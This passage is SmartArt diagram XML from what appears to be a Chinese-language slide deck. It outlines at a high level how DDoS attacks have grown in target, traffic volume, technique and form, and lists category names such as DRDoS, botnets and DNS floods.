    <dgm:cxn modelId="{C7290F7C-C0F5-4C1B-BCD3-66352F4011F6}" srcId="{BC9F7859-6EFA-441D-AF3A-050E14086DCC}" destId="{72B43B28-2F0A-4661-A520-F0D974A6F845}" srcOrd="2" destOrd="0" parTransId="{97D60F69-9FCE-4D15-B92E-4C62664863C3}" sibTransId="{523C40E4-B267-4A17-A609-27B0427CCEF7}"/>
    <dgm:cxn modelId="{B45FC4DF-38E7-A745-B054-245560B27F0A}" type="presParOf" srcId="{068BC06A-A9E1-47BB-8A8A-5F003B0BB63C}" destId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{220171D3-7F1D-B84D-89F1-909A9AF1ACC1}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{1A679D43-DC5F-4DCD-AB0B-467CA612DEDF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{2EA7BF48-0512-0947-96F6-B9A54EEBC3D9}" type="presParOf" srcId="{1A679D43-DC5F-4DCD-AB0B-467CA612DEDF}" destId="{74C9D9A0-E996-4FE9-A0D6-2A03A2BFEA3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C027A589-651A-AB4B-8DFB-6208F8CCD1DE}" type="presParOf" srcId="{1A679D43-DC5F-4DCD-AB0B-467CA612DEDF}" destId="{6041AFDA-EBAF-4752-94D8-CE63AD2CFE30}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C2931B9D-173C-B44D-8E5C-9D24F4564941}" type="presParOf" srcId="{1A679D43-DC5F-4DCD-AB0B-467CA612DEDF}" destId="{8DD400A7-4821-4A46-A0BB-9B41FF75954A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9E1FA944-9A02-554F-809F-FF75EB0B469A}" type="presParOf" srcId="{1A679D43-DC5F-4DCD-AB0B-467CA612DEDF}" destId="{479A99FB-8831-4239-992B-0D54D250408E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{CF75DA99-0CD1-CB47-9E40-FC9DF8F03B1A}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{908BCF92-A2B9-445C-BE8D-D11E1D4DC950}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{C9FEF8EA-5568-614D-914F-2D985B386DA4}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{7B632678-F8F9-47E2-B69B-3FAF485009F0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{07A40636-7A2C-B84F-9F35-927E3C61B5FB}" type="presParOf" srcId="{7B632678-F8F9-47E2-B69B-3FAF485009F0}" destId="{8520B2E3-C03C-460C-8050-9708E766D15C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{FCD27A80-1217-7545-AF83-1916B5F534D5}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{A56AE343-3CD2-43DA-BD3C-A08CE9249182}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{9A62E7A6-13E9-834D-8498-D67BABED03A6}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{7052A352-BD81-479A-BD4A-B6BB8D6460CE}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{020A8C24-8FDD-9F47-8922-118AD798CD9D}" type="presParOf" srcId="{7052A352-BD81-479A-BD4A-B6BB8D6460CE}" destId="{13CEC376-D801-4AE9-BFC0-2F576EE7D0F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{6BA3570F-0E89-874D-90DF-F27EE83B9BAF}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{FC9565B7-7F26-4D8B-A13B-475B32BBBA16}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{8FFF0213-74B1-854E-9EA5-8C2314C8BE8F}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{4495EF31-73EF-4185-B7E6-C29ED1D86A6F}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{4A7E4981-593D-0E48-8C38-3AD97FBB3D96}" type="presParOf" srcId="{4495EF31-73EF-4185-B7E6-C29ED1D86A6F}" destId="{C89F9AE4-2EC7-44BB-BA56-32656C66E8C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{6FC4F030-3063-294A-A5CE-3B696D5BFEED}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{DFA1AFDB-3919-442D-A456-8341E003BBAD}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{51CC3F21-E963-C740-956F-545F691AE884}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{32C23581-77A9-4D86-BF06-7DA76FA39761}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{AB01F5C9-EBDB-234E-84A6-8F709C1FADFF}" type="presParOf" srcId="{32C23581-77A9-4D86-BF06-7DA76FA39761}" destId="{624F20A6-BB97-4E50-A9FE-F5DEF3EE7D4C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{5FC96C38-6E0C-6041-A2DC-DDD6AD86F623}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{1E4390D3-34B7-4A27-86EC-E7CB4B164511}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{65CF1510-DC76-D049-AA86-23C1B77E6DEE}" type="presParOf" srcId="{E6BDCC9B-19E6-4FE1-A402-5E6AE90FC2BF}" destId="{634CB173-B5FE-4930-B27C-734E47A46D9A}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/VerticalCurvedList"/>
    <dgm:cxn modelId="{73005F48-38EB-7B44-B92D-957061D3B9DA}" type="presParOf" srcId="{634CB173-B5FE-4930-B27C-734E47A46D9A}" destId="{5C46165D-6AEA-4D3C-A721-551BD07B52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164785-D9E2-4D5A-989B-4CAEC62BE10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94D9F2-2815-4AB5-AE7A-211B550E8A9F}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t> 目标</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0215E96C-BD2A-4B4B-8686-AA30D62A9A00}" type="parTrans" cxnId="{32AA904F-4BF7-4603-AF95-DEE420B64EAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0134E715-A07D-4F07-B372-BD1E16E0DE95}" type="sibTrans" cxnId="{32AA904F-4BF7-4603-AF95-DEE420B64EAB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBB10C67-DDF7-44C2-8FFA-42F0443524DC}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>流量</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F464592B-72A3-4FE6-A537-E0A149A806DF}" type="parTrans" cxnId="{9472EE4A-2934-406C-99A7-A4307053452F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2CBB239-C61F-4835-8ADE-386B9646FE0C}" type="sibTrans" cxnId="{9472EE4A-2934-406C-99A7-A4307053452F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84A96159-AD5E-4AC3-82AB-CCEB1DE741B8}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1E8ECF9-C8EF-42CA-B393-FEAD9CDCDD62}" type="parTrans" cxnId="{1E572141-4900-45AF-8376-3BC696EFB29B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{865636CD-6B95-4E2E-8648-EFE9DB12DB68}" type="sibTrans" cxnId="{1E572141-4900-45AF-8376-3BC696EFB29B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE8EE64D-F0F7-4094-A630-99B20254DA69}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>网站</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>网络基础设施（路由器</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>交换机</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>/DNS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>等）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{080125E6-6B47-44B5-8B08-67AEC09640DA}" type="parTrans" cxnId="{B191A7BB-2987-45E0-A862-966D8046015A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3B4047D-8E0D-4582-8D3C-E6F176D2576C}" type="sibTrans" cxnId="{B191A7BB-2987-45E0-A862-966D8046015A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CB25321F-65B0-4027-9601-A6AA5E6FD7A5}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>从几百兆</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>几十</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
            <a:t>G</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>几百</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>G</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>甚至更高</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{112C98B6-8D2B-4475-9818-1F8AF0E64789}" type="parTrans" cxnId="{F320B370-21CC-4D14-AEE1-356E96176436}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFED127F-5041-471C-995B-A24BEC1C9578}" type="sibTrans" cxnId="{F320B370-21CC-4D14-AEE1-356E96176436}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A632CE0-E85E-4373-AE96-D76AB4396702}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>真实</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>地址</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>-〉IP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>欺骗技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17C2E703-D343-46F4-9317-E1E9C2E629E7}" type="parTrans" cxnId="{08083346-3078-496E-B5E2-FC712E572E1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74950794-5800-4B62-B226-DCFCB58A8BF4}" type="sibTrans" cxnId="{08083346-3078-496E-B5E2-FC712E572E1C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{982550F7-7298-4C7D-9134-78239F78BE30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>单一攻击源</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>多个攻击源</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3A303B3-F084-443B-88EA-97B49BBAB5C6}" type="parTrans" cxnId="{5E10426E-1CD7-440A-B6A0-CFDF7215AB26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F06E34A-BF23-4D15-A043-3A73AA854A55}" type="sibTrans" cxnId="{5E10426E-1CD7-440A-B6A0-CFDF7215AB26}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52EAD5F0-7864-4EF6-869C-1F4722890547}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>智能化，试图绕过</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>IDS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>或</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>FW</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F06F7BB-0298-4774-9B73-065B5B4985F1}" type="parTrans" cxnId="{95CC8848-8280-4B72-AF9D-3A5422EB2848}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E0FD418-6C70-4140-A7B2-55BF12A9D206}" type="sibTrans" cxnId="{95CC8848-8280-4B72-AF9D-3A5422EB2848}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22EA5057-A671-4B87-B58E-4CDEFE580122}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>简单协议承载</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>-〉</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>复杂协议承载</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BBA5E37-C404-41A0-A569-53A6EC54C9DD}" type="parTrans" cxnId="{DF702F61-63F4-4A93-B850-105C79D1649C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D086DF9-64F2-474F-B579-A77F431E642D}" type="sibTrans" cxnId="{DF702F61-63F4-4A93-B850-105C79D1649C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CC7C495-030E-4363-A8A8-54A8078D2A6E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            <a:t>形式</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{626D8C2A-FD42-4538-BD1A-530BD58ADCEB}" type="parTrans" cxnId="{42818D32-36A8-4F14-AC5B-0C0D3FFC4C61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5DDA7A89-87D4-47A7-A35D-C5E1C0AB9FB8}" type="sibTrans" cxnId="{42818D32-36A8-4F14-AC5B-0C0D3FFC4C61}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42CECADC-D186-4807-9EDC-14CE27B38ED7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>DRDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>/ACK Flood</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{941AFFA5-EF34-4BDE-86EC-2E10D655D525}" type="parTrans" cxnId="{8DB8FC7D-FD58-4BD1-B5BC-C3BAD73B2365}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36DF76F0-A801-4A0A-8436-9838DCB09070}" type="sibTrans" cxnId="{8DB8FC7D-FD58-4BD1-B5BC-C3BAD73B2365}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4A74086-694D-441A-A97E-4A49A5A5BAAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>Zombie Net/BOTNET</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC424436-4FE2-4A16-806C-72D365699758}" type="parTrans" cxnId="{1D6196C3-913F-4B00-BE24-13156576333D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{953A078C-B5BE-4ACE-BFD9-381336EA33FF}" type="sibTrans" cxnId="{1D6196C3-913F-4B00-BE24-13156576333D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D10FFD6A-589E-44AB-A474-8C120CFC4CE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>Proxy Connection Flood</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F5D2444-F6CA-4250-9922-7B19111D08C0}" type="parTrans" cxnId="{1F742B34-C2AB-46BC-B09A-6F7C4FEED64E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F65AC777-5C57-4B21-97F8-1F2C4C0B6DF6}" type="sibTrans" cxnId="{1F742B34-C2AB-46BC-B09A-6F7C4FEED64E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F18610BD-C23B-4DB0-89F5-90ADE607CBDC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
            <a:t>DNS </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            <a:t>Flood </a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A11E257-FD00-42D7-8E39-1AEE3869B433}" type="parTrans" cxnId="{981403F2-5D77-4DF6-AD9A-E20304987503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CDB6A546-041F-43B9-8B2C-B6B704ED2CF0}" type="sibTrans" cxnId="{981403F2-5D77-4DF6-AD9A-E20304987503}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CE44C74-3E6C-4A17-A93D-C80B6007F0DB}" type="pres">
      <dgm:prSet presAssocID="{F3164785-D9E2-4D5A-989B-4CAEC62BE10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CC34BC-18F4-42BC-B9E9-61A06EBAF248}" type="pres">
      <dgm:prSet presAssocID="{6294D9F2-2815-4AB5-AE7A-211B550E8A9F}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{09EC4044-2DFA-499A-A48D-C08EA4FA71DA}" type="pres">
